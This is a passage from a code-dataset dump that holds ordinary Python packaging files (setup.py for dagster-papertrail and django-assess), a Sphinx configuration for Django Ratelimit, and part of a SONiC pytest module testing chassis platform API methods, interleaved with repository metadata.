            "License :: OSI Approved :: Apache Software License",
            "Operating System :: OS Independent",
        ],
        # Ship everything except the test package.
        packages=find_packages(exclude=["test"]),
        install_requires=["dagster"],
        zip_safe=False,
    )
| 32.6875
| 108
| 0.614723
|
from setuptools import find_packages, setup
def get_version():
    """Return ``__version__`` defined in dagster_papertrail/version.py."""
    scope = {}
    with open("dagster_papertrail/version.py") as source:
        exec(source.read(), scope)
    return scope["__version__"]
if __name__ == "__main__":
    setup(
        name="dagster-papertrail",
        # Version string comes from the package's version.py (see get_version).
        version=get_version(),
        author="Elementl",
        author_email="hello@elementl.com",
        license="Apache-2.0",
        description="Package for papertrail Dagster framework components.",
        url="https://github.com/dagster-io/dagster/tree/master/python_modules/libraries/dagster-papertrail",
        classifiers=[
            "Programming Language :: Python :: 2.7",
            "Programming Language :: Python :: 3.6",
            "Programming Language :: Python :: 3.7",
            "License :: OSI Approved :: Apache Software License",
            "Operating System :: OS Independent",
        ],
        # Exclude the test package from the distribution.
        packages=find_packages(exclude=["test"]),
        install_requires=["dagster"],
        zip_safe=False,
    )
| true
| true
|
f70507b2d08d3c940b4529557fed1acefff47752
| 7,835
|
py
|
Python
|
docs/conf.py
|
lcd1232/django-ratelimit2
|
417c677bea537304e48a0015d07902209a2e905a
|
[
"Apache-2.0"
] | null | null | null |
docs/conf.py
|
lcd1232/django-ratelimit2
|
417c677bea537304e48a0015d07902209a2e905a
|
[
"Apache-2.0"
] | null | null | null |
docs/conf.py
|
lcd1232/django-ratelimit2
|
417c677bea537304e48a0015d07902209a2e905a
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Django Ratelimit documentation build configuration file, created by
# sphinx-quickstart on Fri Jan 4 15:55:31 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# No extra Sphinx extensions are needed for these docs.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Django Ratelimit'
copyright = u'2014, James Socol'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
highlight_language = 'python'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoRatelimitdoc'
# -- Options for LaTeX output --------------------------------------------------
# LaTeX builder customisation; all options are left at their defaults.
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
  ('index', 'DjangoRatelimit.tex', u'Django Ratelimit Documentation',
   u'James Socol', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
# One entry per generated man page:
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'djangoratelimit', u'Django Ratelimit Documentation',
     [u'James Socol'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
  ('index', 'DjangoRatelimit', u'Django Ratelimit Documentation',
   u'James Socol', 'DjangoRatelimit', 'One line description of project.',
   'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| 32.110656
| 80
| 0.716273
|
import sys, os
# No extra Sphinx extensions are enabled.
extensions = []
# Paths (relative to this directory) that contain templates.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Django Ratelimit'
copyright = u'2014, James Socol'
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
highlight_language = 'python'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoRatelimitdoc'
# -- Options for LaTeX output --------------------------------------------------
# LaTeX builder customisation; every option is left at its default.
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
  ('index', 'DjangoRatelimit.tex', u'Django Ratelimit Documentation',
   u'James Socol', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'djangoratelimit', u'Django Ratelimit Documentation',
[u'James Socol'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'DjangoRatelimit', u'Django Ratelimit Documentation',
u'James Socol', 'DjangoRatelimit', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| true
| true
|
f705081a5da8e010e9ba2f98abb883270d65219a
| 2,122
|
py
|
Python
|
setup.py
|
powderflask/django_assess
|
cff25c0544a57ed9d7ddb3db3543268e51394875
|
[
"MIT"
] | null | null | null |
setup.py
|
powderflask/django_assess
|
cff25c0544a57ed9d7ddb3db3543268e51394875
|
[
"MIT"
] | null | null | null |
setup.py
|
powderflask/django_assess
|
cff25c0544a57ed9d7ddb3db3543268e51394875
|
[
"MIT"
] | null | null | null |
import sys, os, re
from setuptools import setup, Command, find_packages
from setuptools.command.test import test
class CleanCommand(Command):
    """Custom clean command to tidy up the project root."""
    # No command-line options are accepted.
    user_options = []
    def initialize_options(self):
        # Required by the Command interface; nothing to initialise.
        pass
    def finalize_options(self):
        # Required by the Command interface; nothing to finalise.
        pass
    def run(self):
        # NOTE(review): shells out to `rm`, so this only works on POSIX
        # systems — confirm Windows support is not needed.
        os.system('rm -vrf ./*.pyc ./*.egg-info')
def run_tests(*args):
    """Run the assessment test suite and exit the process with its status.

    Exits with code 1 when the suite reported errors, 0 otherwise, so CI
    tooling can detect failure from the process exit status.
    """
    # Imported lazily so merely importing setup.py does not pull in the app.
    from assessment.tests import run_tests
    errors = run_tests()
    sys.exit(1 if errors else 0)
# Monkey-patch setuptools' test command so `python setup.py test` runs the
# assessment suite through run_tests above instead of the default collector.
test.run_tests = run_tests
NAME = "django-assess"
# get version without importing: read assessment/__init__.py as bytes and
# regex out the __version__ string, so setup.py never imports the package
# (which could require Django to be installed).
with open("assessment/__init__.py", "rb") as f:
    VERSION = str(re.search('__version__ = "(.+?)"', f.read().decode()).group(1))
# pull requirements: requirements.txt is the single source of truth for
# install-time dependencies (one requirement per line).
with open('requirements.txt', "r") as f:
    INSTALL_REQUIREMENTS = f.read().splitlines()
setup(
    name=NAME,
    version=VERSION,
    packages=find_packages(include=['assessment', 'assessment.*']),
    python_requires='>=3.5, <4',
    install_requires = INSTALL_REQUIREMENTS + [
        'setuptools-git',  # apparently needed to handle include_package_data from git repo?
    ],
    license="MIT",
    include_package_data=True,  # declarations in MANIFEST.in
    description=("Basic custom assessments as a reusable django app."),
    long_description=open("README.rst").read(),
    long_description_content_type="text/x-rst",
    author="powderflask",
    author_email="powderflask@gmail.com",
    maintainer="powderflask",
    maintainer_email="powderflask@gmail.com",
    url="https://github.com/powderflask/django_assess",
    download_url="https://github.com/powderflask/django_assess/archive/v{}.tar.gz".format(VERSION),
    classifiers=[
        'Development Status :: 4 - Beta',
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 3',
        'Framework :: Django',
    ],
    cmdclass={
        'clean' : CleanCommand,  # enables `python setup.py clean`
    },
    test_suite="dummy",  # placeholder; actual tests run via patched test.run_tests
)
| 29.472222
| 99
| 0.655985
|
import sys, os, re
from setuptools import setup, Command, find_packages
from setuptools.command.test import test
class CleanCommand(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
os.system('rm -vrf ./*.pyc ./*.egg-info')
def run_tests(*args):
from assessment.tests import run_tests
errors = run_tests()
if errors:
sys.exit(1)
else:
sys.exit(0)
test.run_tests = run_tests
NAME = "django-assess"
with open("assessment/__init__.py", "rb") as f:
VERSION = str(re.search('__version__ = "(.+?)"', f.read().decode()).group(1))
with open('requirements.txt', "r") as f:
INSTALL_REQUIREMENTS = f.read().splitlines()
setup(
name=NAME,
version=VERSION,
packages=find_packages(include=['assessment', 'assessment.*']),
python_requires='>=3.5, <4',
install_requires = INSTALL_REQUIREMENTS + [
'setuptools-git',
],
license="MIT",
include_package_data=True,
description=("Basic custom assessments as a reusable django app."),
long_description=open("README.rst").read(),
long_description_content_type="text/x-rst",
author="powderflask",
author_email="powderflask@gmail.com",
maintainer="powderflask",
maintainer_email="powderflask@gmail.com",
url="https://github.com/powderflask/django_assess",
download_url="https://github.com/powderflask/django_assess/archive/v{}.tar.gz".format(VERSION),
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Framework :: Django',
],
cmdclass={
'clean' : CleanCommand,
},
test_suite="dummy",
)
| true
| true
|
f705083b28a464c87e5ea58fd371f06a46d09124
| 16,794
|
py
|
Python
|
tests/platform_tests/api/test_chassis.py
|
vdahiya12/sonic-mgmt
|
f785cd0bd07f8d2deb0b4bab16feb64f2eeba054
|
[
"Apache-2.0"
] | null | null | null |
tests/platform_tests/api/test_chassis.py
|
vdahiya12/sonic-mgmt
|
f785cd0bd07f8d2deb0b4bab16feb64f2eeba054
|
[
"Apache-2.0"
] | null | null | null |
tests/platform_tests/api/test_chassis.py
|
vdahiya12/sonic-mgmt
|
f785cd0bd07f8d2deb0b4bab16feb64f2eeba054
|
[
"Apache-2.0"
] | null | null | null |
import logging
import re
import pytest
import yaml
from tests.common.helpers.assertions import pytest_assert
from tests.common.helpers.platform_api import chassis
from platform_api_test_base import PlatformApiTestBase
logger = logging.getLogger(__name__)
pytestmark = [
pytest.mark.disable_loganalyzer, # disable automatic loganalyzer
pytest.mark.topology('any')
]
REGEX_MAC_ADDRESS = r'^([0-9A-Fa-f]{2}:){5}([0-9A-Fa-f]{2})$'
REGEX_SERIAL_NUMBER = r'^[A-Za-z0-9]+$'
# Valid OCP ONIE TlvInfo EEPROM type codes as defined here:
# https://opencomputeproject.github.io/onie/design-spec/hw_requirements.html
ONIE_TLVINFO_TYPE_CODE_PRODUCT_NAME = '0x21' # Product Name
ONIE_TLVINFO_TYPE_CODE_PART_NUMBER = '0x22' # Part Number
ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER = '0x23' # Serial Number
ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR = '0x24' # Base MAC Address
ONIE_TLVINFO_TYPE_CODE_MFR_DATE = '0x25' # Manufacture Date
ONIE_TLVINFO_TYPE_CODE_DEVICE_VERSION = '0x26' # Device Version
ONIE_TLVINFO_TYPE_CODE_LABEL_REVISION = '0x27' # Label Revision
ONIE_TLVINFO_TYPE_CODE_PLATFORM_NAME = '0x28' # Platform Name
ONIE_TLVINFO_TYPE_CODE_ONIE_VERSION = '0x29' # ONIE Version
ONIE_TLVINFO_TYPE_CODE_NUM_MACS = '0x2A' # Number of MAC Addresses
ONIE_TLVINFO_TYPE_CODE_MANUFACTURER = '0x2B' # Manufacturer
ONIE_TLVINFO_TYPE_CODE_COUNTRY_CODE = '0x2C' # Country Code
ONIE_TLVINFO_TYPE_CODE_VENDOR = '0x2D' # Vendor
ONIE_TLVINFO_TYPE_CODE_DIAG_VERSION = '0x2E' # Diag Version
ONIE_TLVINFO_TYPE_CODE_SERVICE_TAG = '0x2F' # Service Tag
ONIE_TLVINFO_TYPE_CODE_VENDOR_EXT = '0xFD' # Vendor Extension
ONIE_TLVINFO_TYPE_CODE_CRC32 = '0xFE' # CRC-32
class TestChassisApi(PlatformApiTestBase):
    ''' Platform API test cases for the Chassis class'''

    #
    # Functions to test methods inherited from DeviceBase class
    #

    def test_get_name(self, duthost, localhost, platform_api_conn):
        """Chassis name must be retrievable and be a string."""
        name = chassis.get_name(platform_api_conn)
        pytest_assert(name is not None, "Unable to retrieve chassis name")
        pytest_assert(isinstance(name, str), "Chassis name appears incorrect")

    def test_get_presence(self, duthost, localhost, platform_api_conn):
        """Chassis presence must be a bool and always True."""
        presence = chassis.get_presence(platform_api_conn)
        pytest_assert(presence is not None, "Unable to retrieve chassis presence")
        pytest_assert(isinstance(presence, bool), "Chassis presence appears incorrect")

        # Chassis should always be present
        pytest_assert(presence is True, "Chassis is not present")

    def test_get_model(self, duthost, localhost, platform_api_conn):
        """Chassis model must be retrievable and be a string."""
        model = chassis.get_model(platform_api_conn)
        pytest_assert(model is not None, "Unable to retrieve chassis model")
        pytest_assert(isinstance(model, str), "Chassis model appears incorrect")

    def test_get_serial(self, duthost, localhost, platform_api_conn):
        """Chassis serial number must be retrievable and be a string."""
        serial = chassis.get_serial(platform_api_conn)
        pytest_assert(serial is not None, "Unable to retrieve chassis serial number")
        pytest_assert(isinstance(serial, str), "Chassis serial number appears incorrect")

    def test_get_status(self, duthost, localhost, platform_api_conn):
        """Chassis status must be retrievable and be a bool."""
        status = chassis.get_status(platform_api_conn)
        pytest_assert(status is not None, "Unable to retrieve chassis status")
        pytest_assert(isinstance(status, bool), "Chassis status appears incorrect")

    #
    # Functions to test methods defined in ChassisBase class
    #

    def test_get_base_mac(self, duthost, localhost, platform_api_conn):
        """Base MAC must look like a MAC address and match inventory when present."""
        # Ensure the base MAC address is sane
        base_mac = chassis.get_base_mac(platform_api_conn)
        pytest_assert(base_mac is not None, "Failed to retrieve base MAC address")
        pytest_assert(re.match(REGEX_MAC_ADDRESS, base_mac), "Base MAC address appears to be incorrect")

        if 'base_mac' in duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars:
            expected_base_mac = duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars['base_mac']
            pytest_assert(base_mac == expected_base_mac, "Base MAC address is incorrect")
        else:
            logger.warning('Inventory file does not contain base MAC address for {}'.format(duthost.hostname))

    def test_get_serial_number(self, duthost, localhost, platform_api_conn):
        """Serial number must be sane and match inventory when present."""
        # Ensure the serial number is sane
        # Note: It appears that when retrieving some variable-length fields,
        # the value is padded with trailing '\x00' bytes because the field
        # length is longer than the actual value, so we strip those bytes
        # here before comparing. We may want to change the EEPROM parsing
        # logic to ensure that trailing '\x00' bytes are removed when retreiving
        # a variable-length value.
        serial = chassis.get_serial_number(platform_api_conn)
        # Check for None before stripping; calling .rstrip() on None would
        # raise AttributeError and mask the intended failure message.
        pytest_assert(serial is not None, "Failed to retrieve serial number")
        serial = serial.rstrip('\x00')
        pytest_assert(re.match(REGEX_SERIAL_NUMBER, serial), "Serial number appears to be incorrect")

        if 'serial' in duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars:
            expected_serial = duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars['serial']
            pytest_assert(serial == expected_serial, "Serial number is incorrect")
        else:
            logger.warning('Inventory file does not contain serial number for {}'.format(duthost.hostname))

    def test_get_system_eeprom_info(self, duthost, localhost, platform_api_conn):
        ''' Test that we can retrieve sane system EEPROM info from the DUT via the platform API
        '''
        # OCP ONIE TlvInfo EEPROM type codes defined here: https://opencomputeproject.github.io/onie/design-spec/hw_requirements.html
        VALID_ONIE_TLVINFO_TYPE_CODES_LIST = [
            ONIE_TLVINFO_TYPE_CODE_PRODUCT_NAME,
            ONIE_TLVINFO_TYPE_CODE_PART_NUMBER,
            ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER,
            ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR,
            ONIE_TLVINFO_TYPE_CODE_MFR_DATE,
            ONIE_TLVINFO_TYPE_CODE_DEVICE_VERSION,
            ONIE_TLVINFO_TYPE_CODE_LABEL_REVISION,
            ONIE_TLVINFO_TYPE_CODE_PLATFORM_NAME,
            ONIE_TLVINFO_TYPE_CODE_ONIE_VERSION,
            ONIE_TLVINFO_TYPE_CODE_NUM_MACS,
            ONIE_TLVINFO_TYPE_CODE_MANUFACTURER,
            ONIE_TLVINFO_TYPE_CODE_COUNTRY_CODE,
            ONIE_TLVINFO_TYPE_CODE_VENDOR,
            ONIE_TLVINFO_TYPE_CODE_DIAG_VERSION,
            ONIE_TLVINFO_TYPE_CODE_SERVICE_TAG,
            ONIE_TLVINFO_TYPE_CODE_VENDOR_EXT,
            ONIE_TLVINFO_TYPE_CODE_CRC32
        ]

        MINIMUM_REQUIRED_TYPE_CODES_LIST = [
            ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER,
            ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR,
            ONIE_TLVINFO_TYPE_CODE_CRC32
        ]

        syseeprom_info_dict = chassis.get_system_eeprom_info(platform_api_conn)
        pytest_assert(syseeprom_info_dict is not None, "Failed to retrieve system EEPROM data")
        pytest_assert(isinstance(syseeprom_info_dict, dict), "System EEPROM data is not in the expected format")

        syseeprom_type_codes_list = syseeprom_info_dict.keys()

        # Ensure that all keys in the resulting dictionary are valid ONIE TlvInfo type codes
        pytest_assert(set(syseeprom_type_codes_list) <= set(VALID_ONIE_TLVINFO_TYPE_CODES_LIST), "Invalid TlvInfo type code found")

        # Ensure that we were able to obtain the minimum required type codes
        pytest_assert(set(MINIMUM_REQUIRED_TYPE_CODES_LIST) <= set(syseeprom_type_codes_list), "Minimum required TlvInfo type codes not provided")

        # Ensure the base MAC address is sane
        base_mac = syseeprom_info_dict[ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR]
        pytest_assert(base_mac is not None, "Failed to retrieve base MAC address")
        pytest_assert(re.match(REGEX_MAC_ADDRESS, base_mac), "Base MAC address appears to be incorrect")

        # Ensure the serial number is sane
        serial = syseeprom_info_dict[ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER]
        pytest_assert(serial is not None, "Failed to retrieve serial number")
        pytest_assert(re.match(REGEX_SERIAL_NUMBER, serial), "Serial number appears to be incorrect")

        if 'syseeprom_info' in duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars:
            expected_syseeprom_info_dict = duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars['syseeprom_info']
            pytest_assert(syseeprom_info_dict == expected_syseeprom_info_dict, "System EEPROM info is incorrect")
        else:
            logger.warning('Inventory file does not contain system EEPROM info for {}'.format(duthost.hostname))

    def test_get_reboot_cause(self, duthost, localhost, platform_api_conn):
        """Reboot cause must be a 2-element list (tuple serialized over JSON)."""
        # TODO: Compare return values to potential combinations
        reboot_cause = chassis.get_reboot_cause(platform_api_conn)

        # Actual return value is a tuple, but since we're using the HTTP server
        # to make the call and it uses JSON, the tuple is changed to a list
        pytest_assert(reboot_cause is not None, "Failed to retrieve reboot cause")
        pytest_assert(isinstance(reboot_cause, list) and len(reboot_cause) == 2, "Reboot cause appears to be incorrect")

    def test_components(self, duthost, localhost, platform_api_conn):
        """Component count and per-index lookups must agree with the full list."""
        # TODO: Ensure the number of components and that the returned list is correct for this platform
        try:
            num_components = int(chassis.get_num_components(platform_api_conn))
        except Exception:
            # Bare `except:` would also swallow SystemExit/KeyboardInterrupt
            pytest.fail("num_components is not an integer")

        component_list = chassis.get_all_components(platform_api_conn)
        pytest_assert(component_list is not None, "Failed to retrieve components")
        pytest_assert(isinstance(component_list, list) and len(component_list) == num_components, "Components appear to be incorrect")

        for i in range(num_components):
            component = chassis.get_component(platform_api_conn, i)
            self.expect(component and component == component_list[i], "Component {} is incorrect".format(i))
        self.assert_expectations()

    def test_modules(self, duthost, localhost, platform_api_conn):
        """Module count and per-index lookups must agree with the full list."""
        # TODO: Ensure the number of modules and that the returned list is correct for this platform
        try:
            num_modules = int(chassis.get_num_modules(platform_api_conn))
        except Exception:
            pytest.fail("num_modules is not an integer")

        module_list = chassis.get_all_modules(platform_api_conn)
        pytest_assert(module_list is not None, "Failed to retrieve modules")
        pytest_assert(isinstance(module_list, list) and len(module_list) == num_modules, "Modules appear to be incorrect")

        for i in range(num_modules):
            module = chassis.get_module(platform_api_conn, i)
            self.expect(module and module == module_list[i], "Module {} is incorrect".format(i))
        self.assert_expectations()

    def test_fans(self, duthost, localhost, platform_api_conn):
        """Fan count and per-index lookups must agree with the full list."""
        # TODO: Ensure the number of fans and that the returned list is correct for this platform
        try:
            num_fans = int(chassis.get_num_fans(platform_api_conn))
        except Exception:
            pytest.fail("num_fans is not an integer")

        fan_list = chassis.get_all_fans(platform_api_conn)
        pytest_assert(fan_list is not None, "Failed to retrieve fans")
        pytest_assert(isinstance(fan_list, list) and len(fan_list) == num_fans, "Fans appear to be incorrect")

        for i in range(num_fans):
            fan = chassis.get_fan(platform_api_conn, i)
            self.expect(fan and fan == fan_list[i], "Fan {} is incorrect".format(i))
        self.assert_expectations()

    def test_fan_drawers(self, duthost, localhost, platform_api_conn):
        """Fan drawer count and per-index lookups must agree with the full list."""
        # TODO: Ensure the number of fan drawers and that the returned list is correct for this platform
        try:
            num_fan_drawers = int(chassis.get_num_fan_drawers(platform_api_conn))
        except Exception:
            pytest.fail("num_fan_drawers is not an integer")

        fan_drawer_list = chassis.get_all_fan_drawers(platform_api_conn)
        pytest_assert(fan_drawer_list is not None, "Failed to retrieve fan drawers")
        pytest_assert(isinstance(fan_drawer_list, list) and len(fan_drawer_list) == num_fan_drawers, "Fan drawers appear to be incorrect")

        for i in range(num_fan_drawers):
            fan_drawer = chassis.get_fan_drawer(platform_api_conn, i)
            self.expect(fan_drawer and fan_drawer == fan_drawer_list[i], "Fan drawer {} is incorrect".format(i))
        self.assert_expectations()

    def test_psus(self, duthost, localhost, platform_api_conn):
        """PSU count and per-index lookups must agree with the full list."""
        # TODO: Ensure the number of PSUs and that the returned list is correct for this platform
        try:
            num_psus = int(chassis.get_num_psus(platform_api_conn))
        except Exception:
            pytest.fail("num_psus is not an integer")

        psu_list = chassis.get_all_psus(platform_api_conn)
        pytest_assert(psu_list is not None, "Failed to retrieve PSUs")
        pytest_assert(isinstance(psu_list, list) and len(psu_list) == num_psus, "PSUs appear to be incorrect")

        for i in range(num_psus):
            psu = chassis.get_psu(platform_api_conn, i)
            self.expect(psu and psu == psu_list[i], "PSU {} is incorrect".format(i))
        self.assert_expectations()

    def test_thermals(self, duthost, localhost, platform_api_conn):
        """Thermal count and per-index lookups must agree with the full list."""
        # TODO: Ensure the number of thermals and that the returned list is correct for this platform
        try:
            num_thermals = int(chassis.get_num_thermals(platform_api_conn))
        except Exception:
